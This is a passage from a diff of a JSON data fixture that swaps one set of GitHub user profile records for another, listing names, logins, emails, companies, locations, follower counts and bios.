"2024-06-16T04:25:19Z", + "node_id": "MDQ6VXNlcjg2NDgxMTQ=", "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 6857, + "fields": { + "nest_created_at": "2024-09-22T07:48:34.943Z", + "nest_updated_at": "2024-09-22T18:51:08.567Z", + "name": "Nathan Totten", + "login": "ntotten", + "email": "nathan@ntotten.com", + "avatar_url": "https://avatars.githubusercontent.com/u/282782?v=4", + "company": "Zuplo", + "location": "Remote", + "collaborators_count": 0, + "following_count": 27, + "followers_count": 279, + "public_gists_count": 84, + "public_repositories_count": 149, + "created_at": "2010-05-20T21:04:04Z", + "updated_at": "2024-09-18T22:53:05Z", + "node_id": "MDQ6VXNlcjI4Mjc4Mg==", + "bio": "Co-Founder & CTO @zuplo. Contributor to @prettier. Formerly @salesforce, @auth0 & Microsoft @Azure. ", "is_hireable": false, - "twitter_username": "walkowskimichal" + "twitter_username": "ntotten" } }, { "model": "github.user", - "pk": 1571, + "pk": 6858, "fields": { - "nest_created_at": "2024-09-12T00:10:32.951Z", - "nest_updated_at": "2024-09-12T00:10:48.759Z", - "name": "", - "login": "Kraxi", + "nest_created_at": "2024-09-22T07:48:35.252Z", + "nest_updated_at": "2024-09-22T18:51:08.878Z", + "name": "Nathan Shively-Sanders", + "login": "sandersn", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1633952?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/293473?v=4", + "company": "Microsoft", + "location": "Seattle", "collaborators_count": 0, - "following_count": 3, - "followers_count": 3, - "public_gists_count": 4, - "public_repositories_count": 5, - "created_at": "2012-04-11T17:32:54Z", - "updated_at": "2024-06-29T21:09:30Z", - "node_id": "MDQ6VXNlcjE2MzM5NTI=", - "bio": "", + "following_count": 0, + "followers_count": 1047, + "public_gists_count": 8, + "public_repositories_count": 141, + "created_at": "2010-06-01T17:27:29Z", + "updated_at": "2024-07-10T20:44:16Z", + "node_id": "MDQ6VXNlcjI5MzQ3Mw==", + "bio": "I work on the TypeScript compiler, mostly JS support and managing community PRs.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1572, + "pk": 6859, "fields": { - "nest_created_at": "2024-09-12T00:10:37.452Z", - "nest_updated_at": "2024-09-18T19:00:12.431Z", - "name": "", - "login": "danhgh2", + "nest_created_at": "2024-09-22T07:48:35.580Z", + "nest_updated_at": "2024-09-22T18:51:09.190Z", + "name": "Nate Eagleson", + "login": "NateEag", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/92416927?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/837719?v=4", "company": "", - "location": "", + "location": "Lancaster County, PA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-10-13T03:15:16Z", - "updated_at": "2023-10-06T12:39:36Z", - "node_id": "U_kgDOBYIrnw", - "bio": "", - "is_hireable": false, + "following_count": 1, + "followers_count": 18, + "public_gists_count": 5, + "public_repositories_count": 135, + "created_at": "2011-06-08T14:33:26Z", + "updated_at": "2023-12-13T13:41:35Z", + "node_id": "MDQ6VXNlcjgzNzcxOQ==", + "bio": "Christ-follower. Husband. Dad. Maker.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1573, + "pk": 6860, "fields": { - "nest_created_at": "2024-09-12T00:10:44.003Z", - "nest_updated_at": "2024-09-18T19:00:16.987Z", - "name": "", - "login": "codessensei", + "nest_created_at": "2024-09-22T07:48:35.886Z", + "nest_updated_at": "2024-09-22T18:51:09.525Z", + "name": "Mali McCalla", + "login": "malimccalla", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/66494203?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/18899991?v=4", + "company": "@kordahq ", + "location": "London, UK", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-06-05T20:17:29Z", - "updated_at": "2024-08-26T19:23:49Z", - "node_id": "MDQ6VXNlcjY2NDk0MjAz", + "following_count": 42, + "followers_count": 39, + "public_gists_count": 1, + "public_repositories_count": 152, + "created_at": "2016-05-01T11:20:03Z", + "updated_at": "2024-06-19T19:40:58Z", + "node_id": "MDQ6VXNlcjE4ODk5OTkx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -399578,49 +657427,74 @@ }, { "model": "github.user", - "pk": 1574, + "pk": 6861, "fields": { - "nest_created_at": "2024-09-12T00:10:53.456Z", - "nest_updated_at": "2024-09-18T19:00:21.432Z", - "name": "", - "login": "AppletonByte", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/68258004?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:48:36.200Z", + "nest_updated_at": "2024-09-22T18:51:09.844Z", + "name": "Majid Hajian", + "login": "mhadaily", + "email": "mhadaily@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1325451?v=4", + "company": "Microsoft", + "location": "Oslo, Norway", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 15, - "created_at": "2020-07-14T01:05:14Z", - "updated_at": "2024-09-06T12:10:37Z", - "node_id": "MDQ6VXNlcjY4MjU4MDA0", + "following_count": 352, + "followers_count": 1177, + "public_gists_count": 14, + "public_repositories_count": 146, + "created_at": "2012-01-12T18:02:25Z", + "updated_at": "2024-09-13T11:40:13Z", + "node_id": "MDQ6VXNlcjEzMjU0NTE=", + "bio": "Working on Dev stuff @Microsoft \r\n- Google Developer Expert for Flutter and Dart. Passionate Software Engineer, Author, Public Speaker, and community leader. ", + "is_hireable": true, + "twitter_username": "mhadaily" + } +}, +{ + "model": "github.user", + "pk": 6862, + "fields": { + "nest_created_at": "2024-09-22T07:48:36.522Z", + "nest_updated_at": "2024-09-22T18:51:10.152Z", + "name": "Magnus Walbeck", + "login": "mwalbeck", + "email": "mw@mwalbeck.org", + "avatar_url": "https://avatars.githubusercontent.com/u/19759293?v=4", + "company": "Walbeck IT", + "location": "Denmark", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 10, + "public_gists_count": 1, + "public_repositories_count": 36, + "created_at": "2016-06-05T10:01:42Z", + "updated_at": "2024-08-25T08:34:00Z", + "node_id": "MDQ6VXNlcjE5NzU5Mjkz", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1575, + "pk": 6863, "fields": { - "nest_created_at": "2024-09-12T00:11:05.273Z", - "nest_updated_at": "2024-09-18T19:12:35.376Z", - "name": "Matt Stanchek", - "login": "xpert98", + "nest_created_at": "2024-09-22T07:48:36.827Z", + "nest_updated_at": "2024-09-22T18:51:10.500Z", + "name": "Lynette", + "login": "lynette-li", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7390513?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/26057041?v=4", "company": "", - "location": "", + "location": "Shenzhen, Guangdong, China", "collaborators_count": 0, - "following_count": 1, - "followers_count": 4, + "following_count": 13, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2014-04-24T01:59:28Z", - "updated_at": "2024-09-06T16:22:31Z", - "node_id": "MDQ6VXNlcjczOTA1MTM=", + "public_repositories_count": 18, + "created_at": "2017-02-27T08:38:11Z", + "updated_at": "2024-09-06T10:51:00Z", + "node_id": "MDQ6VXNlcjI2MDU3MDQx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -399628,124 +657502,124 @@ }, { "model": "github.user", - "pk": 1576, + "pk": 6864, "fields": { - "nest_created_at": "2024-09-12T00:11:26.432Z", - "nest_updated_at": "2024-09-18T19:01:06.715Z", - "name": "OWASP PurpleTeam", - "login": "purpleteam-labs", - "email": "info@purpleteam-labs.com", - "avatar_url": "https://avatars.githubusercontent.com/u/40907648?v=4", + "nest_created_at": "2024-09-22T07:48:37.139Z", + "nest_updated_at": "2024-09-22T18:51:10.825Z", + "name": "Luuk Dobber", + "login": "luukdobber", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1858881?v=4", "company": "", - "location": "New Zealand (Aotearoa)", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 54, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2018-07-07T05:08:54Z", - "updated_at": "2021-09-20T03:10:29Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjQwOTA3NjQ4", - "bio": "Web Security Regression Testing CLI & SaaS for your build pipeline", + "public_repositories_count": 8, + "created_at": "2012-06-17T13:23:58Z", + "updated_at": "2024-08-13T10:14:45Z", + "node_id": "MDQ6VXNlcjE4NTg4ODE=", + "bio": "", "is_hireable": false, - "twitter_username": "OWASPPurpleTeam" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1577, + "pk": 6865, "fields": { - "nest_created_at": "2024-09-12T00:11:54.366Z", - "nest_updated_at": "2024-09-12T00:11:54.366Z", - "name": "Antonette Caldwell", - "login": "acald-creator", - "email": "pullmana8@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/18711313?v=4", + "nest_created_at": "2024-09-22T07:48:37.456Z", + "nest_updated_at": "2024-09-22T18:51:11.158Z", + "name": "Luiz Victor Linhares Rocha", + "login": "BigsonLvrocha", + "email": "luizvictorlrocha@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/14062008?v=4", "company": "", - "location": "Louisiana", + "location": "São Carlos - SP - Brasil", "collaborators_count": 0, "following_count": 13, - "followers_count": 23, + "followers_count": 36, "public_gists_count": 1, - "public_repositories_count": 118, - "created_at": "2016-04-28T02:12:44Z", - "updated_at": "2024-09-08T23:56:15Z", - "node_id": "MDQ6VXNlcjE4NzExMzEz", - "bio": "", + "public_repositories_count": 48, + "created_at": "2015-08-31T20:53:00Z", + "updated_at": "2024-07-03T14:16:27Z", + "node_id": "MDQ6VXNlcjE0MDYyMDA4", + "bio": "Software Engineer", "is_hireable": false, - "twitter_username": "" + "twitter_username": "LuizVictorLinh1" } }, { "model": "github.user", - "pk": 1578, + "pk": 6866, "fields": { - "nest_created_at": "2024-09-12T00:11:54.779Z", - "nest_updated_at": "2024-09-12T00:11:54.779Z", - "name": "Lakshay Tyagi", - "login": "imlakshay08", - "email": "tyagilakshay119@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/77228428?v=4", - "company": "@be-procloud", - "location": "New Delhi, India", + "nest_created_at": "2024-09-22T07:48:37.798Z", + "nest_updated_at": "2024-09-22T18:51:11.465Z", + "name": "Luis Ruiz Pavon", + "login": "lurumad", + "email": "luisruizpavon@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1729519?v=4", + "company": "EmergenceAI / Merlyn Mind", + "location": "Madrid", "collaborators_count": 0, - "following_count": 98, - "followers_count": 54, - "public_gists_count": 1, - "public_repositories_count": 87, - "created_at": "2021-01-10T10:07:45Z", - "updated_at": "2024-09-05T12:31:45Z", - "node_id": "MDQ6VXNlcjc3MjI4NDI4", - "bio": "Open source enthusiast || Full stack developer || Ruby On Rails || JAVA || Talk is cheap. Show me the code.", - "is_hireable": true, - "twitter_username": "imLakshay08" + "following_count": 15, + "followers_count": 208, + "public_gists_count": 20, + "public_repositories_count": 189, + "created_at": "2012-05-11T08:58:23Z", + "updated_at": "2024-09-22T07:50:20Z", + "node_id": "MDQ6VXNlcjE3Mjk1MTk=", + "bio": "Principal Software Engineer at Merlyn Mind (Prev. EventBrite)", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 1579, + "pk": 6867, "fields": { - "nest_created_at": "2024-09-12T00:12:01.261Z", - "nest_updated_at": "2024-09-18T19:00:32.428Z", - "name": "Yuvaraj Yadav", - "login": "yuvaraj119", - "email": "yuvaraj119@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/10301575?v=4", - "company": "", - "location": "Portland, OR", + "nest_created_at": "2024-09-22T07:48:38.118Z", + "nest_updated_at": "2024-09-22T18:51:11.788Z", + "name": "Lucas Araujo", + "login": "lucaslra", + "email": "lucas.lra@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2528972?v=4", + "company": "Schuberg Philis", + "location": "Breda, Netherlands", "collaborators_count": 0, - "following_count": 48, - "followers_count": 44, - "public_gists_count": 2, - "public_repositories_count": 29, - "created_at": "2014-12-26T06:23:02Z", - "updated_at": "2024-09-04T11:26:06Z", - "node_id": "MDQ6VXNlcjEwMzAxNTc1", - "bio": "Developer\r\nhttps://yuvaraj119gmailcom.itch.io/\r\n", - "is_hireable": true, + "following_count": 59, + "followers_count": 31, + "public_gists_count": 4, + "public_repositories_count": 32, + "created_at": "2012-10-10T14:28:12Z", + "updated_at": "2024-09-22T12:08:57Z", + "node_id": "MDQ6VXNlcjI1Mjg5NzI=", + "bio": ".NET, Python, Golang :)", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1580, + "pk": 6868, "fields": { - "nest_created_at": "2024-09-12T00:13:31.803Z", - "nest_updated_at": "2024-09-18T19:01:10.513Z", - "name": "The OAG Development Project", - "login": "The-OAG-Development-Project", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/157876698?v=4", + "nest_created_at": "2024-09-22T07:48:38.427Z", + "nest_updated_at": "2024-09-22T18:51:12.112Z", + "name": "Lorian Coltof", + "login": "LorianColtof", + "email": "loriancoltof@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3457005?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2024-01-27T07:51:13Z", - "updated_at": "2024-01-27T07:53:02Z", - "node_id": "O_kgDOCWkB2g", + "public_repositories_count": 22, + "created_at": "2013-02-02T13:56:25Z", + "updated_at": "2024-08-14T12:57:17Z", + "node_id": "MDQ6VXNlcjM0NTcwMDU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -399753,24 +657627,24 @@ }, { "model": "github.user", - "pk": 1581, + "pk": 6869, "fields": { - "nest_created_at": "2024-09-12T00:13:34.904Z", - "nest_updated_at": "2024-09-12T00:13:34.904Z", - "name": "Cyril Grossenbacher", - "login": "Freerider689", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5794592?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:48:38.738Z", + "nest_updated_at": "2024-09-22T18:51:12.421Z", + "name": "Liangying.Wei", + "login": "vicancy", + "email": "lianwei@microsoft.com", + "avatar_url": "https://avatars.githubusercontent.com/u/668244?v=4", + "company": "Microsoft", + "location": "Shanghai", "collaborators_count": 0, - "following_count": 28, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2013-10-28T13:57:55Z", - "updated_at": "2021-07-04T13:45:07Z", - "node_id": "MDQ6VXNlcjU3OTQ1OTI=", + "following_count": 15, + "followers_count": 85, + "public_gists_count": 6, + "public_repositories_count": 65, + "created_at": "2011-03-14T09:22:58Z", + "updated_at": "2024-09-18T05:34:19Z", + "node_id": "MDQ6VXNlcjY2ODI0NA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -399778,74 +657652,74 @@ }, { "model": "github.user", - "pk": 1582, + "pk": 6870, "fields": { - "nest_created_at": "2024-09-12T00:13:36.607Z", - "nest_updated_at": "2024-09-12T00:13:59.036Z", - "name": "", - "login": "gianlucafrei", + "nest_created_at": "2024-09-22T07:48:39.052Z", + "nest_updated_at": "2024-09-22T18:51:12.734Z", + "name": "Leo Feyer", + "login": "leofeyer", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/20921075?v=4", - "company": "", - "location": "Bern Switzerland", + "avatar_url": "https://avatars.githubusercontent.com/u/1192057?v=4", + "company": "Feyer Media GmbH", + "location": "Wuppertal, Germany", "collaborators_count": 0, - "following_count": 13, - "followers_count": 17, - "public_gists_count": 2, - "public_repositories_count": 19, - "created_at": "2016-08-09T06:19:02Z", - "updated_at": "2024-08-30T03:05:45Z", - "node_id": "MDQ6VXNlcjIwOTIxMDc1", - "bio": "", + "following_count": 15, + "followers_count": 219, + "public_gists_count": 1, + "public_repositories_count": 7, + "created_at": "2011-11-13T18:12:25Z", + "updated_at": "2024-09-18T09:49:48Z", + "node_id": "MDQ6VXNlcjExOTIwNTc=", + "bio": "Server admin at day, coder at night. Mostly working on @contao together with the guys from @terminal42, @1up-lab, @ausi and some other great people.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "leofeyer" } }, { "model": "github.user", - "pk": 1583, + "pk": 6871, "fields": { - "nest_created_at": "2024-09-12T00:13:41.279Z", - "nest_updated_at": "2024-09-18T19:01:13.438Z", - "name": "Padi Steger (OWASP Switzerland)", - "login": "Padi-owasp", + "nest_created_at": "2024-09-22T07:48:39.359Z", + "nest_updated_at": "2024-09-22T18:51:13.038Z", + "name": "Laurie O", + "login": "EpicWink", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/77661049?v=4", - "company": "", - "location": "Switzerland", + "avatar_url": "https://avatars.githubusercontent.com/u/25142085?v=4", + "company": "SiteSee", + "location": "Brisbane, Australia", "collaborators_count": 0, - "following_count": 0, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2021-01-19T06:59:53Z", - "updated_at": "2024-07-30T13:12:18Z", - "node_id": "MDQ6VXNlcjc3NjYxMDQ5", - "bio": "I'm OWASP Switzerland Chapter co-lead and contributor to and co-lead of the OWASP Application Gateway.\r\nI'm working as a principal security consultant.", + "following_count": 2, + "followers_count": 8, + "public_gists_count": 8, + "public_repositories_count": 73, + "created_at": "2017-01-16T02:16:45Z", + "updated_at": "2024-08-01T13:23:07Z", + "node_id": "MDQ6VXNlcjI1MTQyMDg1", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1584, + "pk": 6872, "fields": { - "nest_created_at": "2024-09-12T00:13:43.328Z", - "nest_updated_at": "2024-09-12T00:13:44.563Z", - "name": "Tomáš Matejov", - "login": "tommathee", + "nest_created_at": "2024-09-22T07:48:39.672Z", + "nest_updated_at": "2024-09-22T18:51:13.357Z", + "name": "Labhansh Agrawal", + "login": "LabhanshAgrawal", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/55752654?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/16598275?v=4", "company": "", - "location": "", + "location": "Bangalore, India", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2019-09-24T14:28:30Z", - "updated_at": "2024-08-20T12:06:17Z", - "node_id": "MDQ6VXNlcjU1NzUyNjU0", + "following_count": 8, + "followers_count": 60, + "public_gists_count": 2, + "public_repositories_count": 31, + "created_at": "2016-01-07T18:41:25Z", + "updated_at": "2024-09-13T14:09:39Z", + "node_id": "MDQ6VXNlcjE2NTk4Mjc1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -399853,249 +657727,249 @@ }, { "model": "github.user", - "pk": 1585, + "pk": 6873, "fields": { - "nest_created_at": "2024-09-12T00:14:07.609Z", - "nest_updated_at": "2024-09-18T19:01:18.283Z", - "name": "Abhineet Jayaraj", - "login": "interference-security", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5358495?v=4", + "nest_created_at": "2024-09-22T07:48:39.989Z", + "nest_updated_at": "2024-09-22T18:51:13.665Z", + "name": "Kyle Buller", + "login": "nebularg", + "email": "bullerk@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1010803?v=4", "company": "", - "location": "", + "location": "Minnesota", "collaborators_count": 0, - "following_count": 10, - "followers_count": 244, - "public_gists_count": 32, - "public_repositories_count": 52, - "created_at": "2013-09-01T14:16:38Z", - "updated_at": "2024-09-08T19:15:48Z", - "node_id": "MDQ6VXNlcjUzNTg0OTU=", + "following_count": 0, + "followers_count": 19, + "public_gists_count": 14, + "public_repositories_count": 32, + "created_at": "2011-08-29T01:23:29Z", + "updated_at": "2024-09-20T20:17:39Z", + "node_id": "MDQ6VXNlcjEwMTA4MDM=", "bio": "", - "is_hireable": false, - "twitter_username": "xploresec" + "is_hireable": true, + "twitter_username": "" } }, { "model": "github.user", - "pk": 1586, + "pk": 6874, "fields": { - "nest_created_at": "2024-09-12T00:14:10.616Z", - "nest_updated_at": "2024-09-18T19:01:20.656Z", - "name": "Adrien de Beaupre", - "login": "adriendb", - "email": "adriendb@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1918063?v=4", - "company": "", - "location": "Canada", + "nest_created_at": "2024-09-22T07:48:40.307Z", + "nest_updated_at": "2024-09-22T18:51:13.988Z", + "name": "Kisaragi", + "login": "KisaragiEffective", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/48310258?v=4", + "company": "Some(_)", + "location": "Hokkaido, Japan", "collaborators_count": 0, - "following_count": 2, - "followers_count": 7, - "public_gists_count": 0, - "public_repositories_count": 23, - "created_at": "2012-07-03T12:40:07Z", - "updated_at": "2021-11-15T18:52:48Z", - "node_id": "MDQ6VXNlcjE5MTgwNjM=", - "bio": "InfoSec geek,\r\nMartial artist,\r\nBreaker of the unbreakable, fixer of the broken. ", + "following_count": 81, + "followers_count": 113, + "public_gists_count": 61, + "public_repositories_count": 387, + "created_at": "2019-03-07T06:48:42Z", + "updated_at": "2024-04-27T20:50:02Z", + "node_id": "MDQ6VXNlcjQ4MzEwMjU4", + "bio": "forall p in union(people, software). kisaragi hack p", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1587, + "pk": 6875, "fields": { - "nest_created_at": "2024-09-12T00:14:11.844Z", - "nest_updated_at": "2024-09-18T19:01:24.742Z", - "name": "Mónica Pastor", - "login": "mpast", + "nest_created_at": "2024-09-22T07:48:40.620Z", + "nest_updated_at": "2024-09-22T18:51:14.300Z", + "name": "Kirill Belorunov", + "login": "Wixty", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9053588?v=4", - "company": "@auth0", - "location": "Madrid", + "avatar_url": "https://avatars.githubusercontent.com/u/7947186?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 24, - "public_gists_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 6, "public_repositories_count": 11, - "created_at": "2014-10-07T16:04:06Z", - "updated_at": "2024-09-13T12:21:23Z", - "node_id": "MDQ6VXNlcjkwNTM1ODg=", - "bio": "Application Security & Development", + "created_at": "2014-06-20T23:19:37Z", + "updated_at": "2024-05-22T10:14:01Z", + "node_id": "MDQ6VXNlcjc5NDcxODY=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1588, + "pk": 6876, "fields": { - "nest_created_at": "2024-09-12T00:14:14.933Z", - "nest_updated_at": "2024-09-13T05:14:40.282Z", - "name": "", - "login": "f0xp1t", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/153251075?v=4", + "nest_created_at": "2024-09-22T07:48:40.933Z", + "nest_updated_at": "2024-09-22T18:51:14.610Z", + "name": "Michael Fan", + "login": "michaelyfan", + "email": "michaelyfan100@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/20048479?v=4", "company": "", - "location": "", + "location": "USA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 3, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-12-08T02:41:38Z", - "updated_at": "2024-08-25T03:08:44Z", - "node_id": "U_kgDOCSJtAw", - "bio": "breaking-fixing , interested in how things work. Curiosity is my drive.", + "public_repositories_count": 19, + "created_at": "2016-06-20T16:05:49Z", + "updated_at": "2024-09-13T13:08:31Z", + "node_id": "MDQ6VXNlcjIwMDQ4NDc5", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1589, + "pk": 6877, "fields": { - "nest_created_at": "2024-09-12T00:14:42.835Z", - "nest_updated_at": "2024-09-18T19:01:41.308Z", - "name": "SSRD", - "login": "ssrdio", + "nest_created_at": "2024-09-22T07:48:41.645Z", + "nest_updated_at": "2024-09-22T18:51:15.320Z", + "name": "Mayank", + "login": "mayank", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/43420216?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2293928?v=4", + "company": "UrbanPiper", + "location": "Delhi, India", "collaborators_count": 0, - "following_count": 0, - "followers_count": 10, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2018-09-19T18:29:39Z", - "updated_at": "2020-04-14T13:00:22Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjQzNDIwMjE2", - "bio": "Software, Security, Research & Development", - "is_hireable": false, + "following_count": 21, + "followers_count": 35, + "public_gists_count": 12, + "public_repositories_count": 81, + "created_at": "2012-09-06T18:44:03Z", + "updated_at": "2024-09-03T17:29:43Z", + "node_id": "MDQ6VXNlcjIyOTM5Mjg=", + "bio": "Engineering @urbanpiper ", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1590, + "pk": 6878, "fields": { - "nest_created_at": "2024-09-12T00:14:46.371Z", - "nest_updated_at": "2024-09-12T00:14:47.191Z", - "name": "", - "login": "GregorSpagnolo", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4869477?v=4", - "company": "@ssrdio ", + "nest_created_at": "2024-09-22T07:48:41.965Z", + "nest_updated_at": "2024-09-22T18:51:15.638Z", + "name": "Max Riveiro", + "login": "kavu", + "email": "horned@kavu.dev", + "avatar_url": "https://avatars.githubusercontent.com/u/1994?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 6, - "public_gists_count": 1, - "public_repositories_count": 7, - "created_at": "2013-06-28T15:35:02Z", - "updated_at": "2023-08-31T14:07:25Z", - "node_id": "MDQ6VXNlcjQ4Njk0Nzc=", + "following_count": 132, + "followers_count": 174, + "public_gists_count": 45, + "public_repositories_count": 113, + "created_at": "2008-03-03T09:31:10Z", + "updated_at": "2024-09-09T21:09:11Z", + "node_id": "MDQ6VXNlcjE5OTQ=", "bio": "", "is_hireable": false, - "twitter_username": "gregorspagnolo" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1591, + "pk": 6879, "fields": { - "nest_created_at": "2024-09-12T00:14:48.020Z", - "nest_updated_at": "2024-09-12T00:14:48.878Z", - "name": "", - "login": "UrbanVogrin", + "nest_created_at": "2024-09-22T07:48:42.592Z", + "nest_updated_at": "2024-09-22T18:51:16.261Z", + "name": "Matt Q", + "login": "irrationalRock", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/58254475?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/16523071?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-11-27T10:12:03Z", - "updated_at": "2022-05-17T07:06:07Z", - "node_id": "MDQ6VXNlcjU4MjU0NDc1", - "bio": "", + "following_count": 7, + "followers_count": 3, + "public_gists_count": 19, + "public_repositories_count": 42, + "created_at": "2016-01-03T05:08:06Z", + "updated_at": "2024-07-04T17:52:31Z", + "node_id": "MDQ6VXNlcjE2NTIzMDcx", + "bio": "Programmer, Blogger, Man of the Woods, Conveyor of Messages, Siri's Ex-Boyfriend. I draw on fogged up windows.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1592, + "pk": 6880, "fields": { - "nest_created_at": "2024-09-12T00:15:22.137Z", - "nest_updated_at": "2024-09-13T05:13:33.826Z", - "name": "Nikita Stupin", - "login": "nikitastupin", + "nest_created_at": "2024-09-22T07:48:42.934Z", + "nest_updated_at": "2024-09-22T18:51:16.568Z", + "name": "Mathieu Dumont", + "login": "Madumo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/18281368?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2637675?v=4", + "company": "@mirego ", + "location": "Québec", "collaborators_count": 0, - "following_count": 22, - "followers_count": 172, + "following_count": 18, + "followers_count": 13, "public_gists_count": 2, - "public_repositories_count": 21, - "created_at": "2016-04-05T08:00:35Z", - "updated_at": "2024-07-30T09:19:01Z", - "node_id": "MDQ6VXNlcjE4MjgxMzY4", + "public_repositories_count": 32, + "created_at": "2012-10-24T03:58:11Z", + "updated_at": "2024-08-12T15:51:55Z", + "node_id": "MDQ6VXNlcjI2Mzc2NzU=", "bio": "", "is_hireable": false, - "twitter_username": "_nikitastupin" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1593, + "pk": 6881, "fields": { - "nest_created_at": "2024-09-12T00:15:28.148Z", - "nest_updated_at": "2024-09-18T19:02:09.678Z", - "name": "Arshan Dabirsiaghi", - "login": "nahsra", + "nest_created_at": "2024-09-22T07:48:43.251Z", + "nest_updated_at": "2024-09-22T18:51:16.880Z", + "name": "Martin Theiss", + "login": "mtheiss", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/911610?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6665475?v=4", "company": "", - "location": "Baltimore, MD", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 41, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 34, - "created_at": "2011-07-13T01:17:05Z", - "updated_at": "2024-08-26T23:38:52Z", - "node_id": "MDQ6VXNlcjkxMTYxMA==", - "bio": "CTO, Pixee\r\n\r\nex-Chief Scientist & Co-Founder Contrast Security", + "public_repositories_count": 19, + "created_at": "2014-02-12T20:22:59Z", + "updated_at": "2024-05-21T04:32:12Z", + "node_id": "MDQ6VXNlcjY2NjU0NzU=", + "bio": "", "is_hireable": false, - "twitter_username": 